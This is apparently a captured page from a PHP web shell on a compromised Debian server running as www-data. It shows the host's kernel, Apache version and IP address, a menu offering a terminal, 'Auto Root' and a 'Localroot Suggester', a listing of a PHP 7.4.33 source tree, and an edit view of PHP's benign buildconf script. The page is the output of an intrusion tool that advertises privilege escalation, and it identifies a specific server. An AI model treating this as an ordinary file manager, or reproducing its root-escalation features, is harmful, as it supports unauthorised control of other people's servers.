Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.35
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
src /
php-7.4.33 /
Delete
Unzip
Name
Size
Permission
Date
Action
TSRM
[ DIR ]
drwxrwxr-x
2024-03-12 14:32
Zend
[ DIR ]
drwxrwxr-x
2024-03-12 14:35
appveyor
[ DIR ]
drwxrwxr-x
2022-10-31 11:36
azure
[ DIR ]
drwxrwxr-x
2022-10-31 11:36
build
[ DIR ]
drwxrwxr-x
2022-10-31 11:36
docs
[ DIR ]
drwxrwxr-x
2022-10-31 11:36
ext
[ DIR ]
drwxrwxr-x
2022-10-31 11:36
include
[ DIR ]
drwxr-xr-x
2024-03-12 14:17
libs
[ DIR ]
drwxr-xr-x
2024-03-12 14:17
main
[ DIR ]
drwxrwxr-x
2024-03-12 14:36
modules
[ DIR ]
drwxr-xr-x
2024-03-12 15:33
pear
[ DIR ]
drwxrwxr-x
2022-10-31 11:36
sapi
[ DIR ]
drwxrwxr-x
2022-10-31 11:36
scripts
[ DIR ]
drwxrwxr-x
2024-03-12 14:19
tests
[ DIR ]
drwxrwxr-x
2022-10-31 11:36
travis
[ DIR ]
drwxrwxr-x
2022-10-31 11:36
win32
[ DIR ]
drwxrwxr-x
2022-10-31 11:36
.appveyor.yml
1.52
KB
-rw-rw-r--
2022-10-31 11:36
.editorconfig
733
B
-rw-rw-r--
2022-10-31 11:36
.gdbinit
12.99
KB
-rw-rw-r--
2022-10-31 11:36
.gitattributes
758
B
-rw-rw-r--
2022-10-31 11:36
.gitignore
8.35
KB
-rw-rw-r--
2022-10-31 11:36
.travis.yml
2.63
KB
-rw-rw-r--
2022-10-31 11:36
CODING_STANDARDS.md
12.44
KB
-rw-rw-r--
2022-10-31 11:36
CONTRIBUTING.md
19.8
KB
-rw-rw-r--
2022-10-31 11:36
EXTENSIONS
23.17
KB
-rw-rw-r--
2022-10-31 11:36
LICENSE
3.13
KB
-rw-rw-r--
2022-10-31 11:36
Makefile
266.14
KB
-rw-r--r--
2024-03-12 14:19
Makefile.fragments
12.57
KB
-rw-r--r--
2024-03-12 14:19
Makefile.objects
220.54
KB
-rw-r--r--
2024-03-12 14:19
NEWS
99.68
KB
-rw-rw-r--
2022-10-31 11:36
README.REDIST.BINS
28.9
KB
-rw-rw-r--
2022-10-31 11:36
README.md
4.6
KB
-rw-rw-r--
2022-10-31 11:36
UPGRADING
33.75
KB
-rw-rw-r--
2022-10-31 11:36
UPGRADING.INTERNALS
15.42
KB
-rw-rw-r--
2022-10-31 11:36
azure-pipelines.yml
3.39
KB
-rw-rw-r--
2022-10-31 11:36
buildconf
3.92
KB
-rwxrwxr-x
2022-10-31 11:36
buildconf.bat
346
B
-rw-rw-r--
2022-10-31 11:36
config.log
815.21
KB
-rw-r--r--
2024-03-12 14:19
config.nice
418
B
-rwxr-xr-x
2024-03-12 14:18
config.status
45.81
KB
-rwxr-xr-x
2024-03-12 14:19
configure
2.28
MB
-rwxr-xr-x
2022-10-31 11:36
configure.ac
43.16
KB
-rw-rw-r--
2022-10-31 11:36
libtool
215.58
KB
-rwxr-xr-x
2024-03-12 14:19
php.ini-development
70.85
KB
-rw-rw-r--
2022-10-31 11:36
php.ini-production
70.88
KB
-rw-rw-r--
2022-10-31 11:36
run-tests.php
124.08
KB
-rwxrwxr-x
2022-10-31 11:36
Save
Rename
#!/bin/sh # # A wrapper around Autoconf that generates files to build PHP on *nix systems. PHP_AUTOCONF=${PHP_AUTOCONF:-autoconf} PHP_AUTOHEADER=${PHP_AUTOHEADER:-autoheader} force=0 debug=0 # Go to project root. cd $(CDPATH= cd -- "$(dirname -- "$0")" && pwd -P) php_extra_version=$(grep '^AC_INIT(' configure.ac) case "$php_extra_version" in *-dev*) dev=1 ;; *) dev=0 ;; esac while test $# -gt 0; do if test "$1" = "-h" || test "$1" = "--help"; then cat << HELP PHP buildconf A wrapper around the autoconf and autoheader that generate files for building PHP on *nix systems (configure and main/php_config.h.in). The configure script is used to customize the PHP build based on the provided options and system. PHP releases downloaded from PHP.net already include the configure script so installing Autoconf and running buildconf is not needed. For the PHP sources from the Git repository, buildconf is used for generating a new configure script and required files. SYNOPSIS: buildconf [<options>] OPTIONS: -f, --force Regenerate configure files in PHP release packages. --debug Display warnings emitted by Autoconf. -h, --help Display this help. ENVIRONMENT: The following optional variables are supported: PHP_AUTOCONF Overrides the path to autoconf tool. PHP_AUTOCONF=/path/to/autoconf ./buildconf PHP_AUTOHEADER Overrides the path to autoheader tool. PHP_AUTOHEADER=/path/to/autoheader ./buildconf HELP exit 0 fi if test "$1" = "-f" || test "$1" = "--force"; then force=1 fi if test "$1" = "--debug"; then debug=1 fi shift done if test "$dev" = "0" && test "$force" = "0"; then if test -f "configure" && test -f "main/php_config.h.in"; then echo "buildconf: The configure script is already built. All done." echo " Run ./configure to proceed with customizing the PHP build." exit 0 else echo "buildconf: Configure files are missing." >&2 echo " Run ./buildconf --force to create a configure script." >&2 exit 1 fi fi echo "buildconf: Checking installation" # Get minimum required autoconf version from the configure.ac file. min_version=$(sed -n 's/AC_PREREQ(\[\(.*\)\])/\1/p' configure.ac) # Check if autoconf exists. ac_version=$($PHP_AUTOCONF --version 2>/dev/null|head -n 1|sed -e 's/^[^0-9]*//' -e 's/[a-z]* *$//') if test -z "$ac_version"; then echo "buildconf: autoconf not found." >&2 echo " You need autoconf version $min_version or newer installed" >&2 echo " to build PHP from Git." >&2 exit 1 fi # Check autoconf version. set -f; IFS='.'; set -- $ac_version; set +f; IFS=' ' ac_version_num="$(expr ${1} \* 10000 + ${2} \* 100)" set -f; IFS='.'; set -- $min_version; set +f; IFS=' ' min_version_num="$(expr ${1} \* 10000 + ${2} \* 100)" if test "$ac_version_num" -lt "$min_version_num"; then echo "buildconf: autoconf version $ac_version found." >&2 echo " You need autoconf version $min_version or newer installed" >&2 echo " to build PHP from Git." >&2 exit 1 else echo "buildconf: autoconf version $ac_version (ok)" fi if test "$force" = "1"; then echo "buildconf: Forcing buildconf. The configure files will be regenerated." fi # Clean cache and explicitly remove all targets if present. Remove also # aclocal.m4 if present. It is automatically included by autoconf but not used # by the PHP build system since PHP 7.4. echo "buildconf: Cleaning cache and configure files" rm -rf \ aclocal.m4 \ autom4te.cache \ config.cache \ configure \ main/php_config.h.in if test "$debug" = "1"; then autoconf_flags="-f -Wall" autoheader_flags="-Wall" else autoconf_flags="-f" autoheader_flags="" fi echo "buildconf: Rebuilding configure" $PHP_AUTOCONF $autoconf_flags echo "buildconf: Rebuilding main/php_config.h.in" $PHP_AUTOHEADER $autoheader_flags echo "buildconf: Run ./configure to proceed with customizing the PHP build."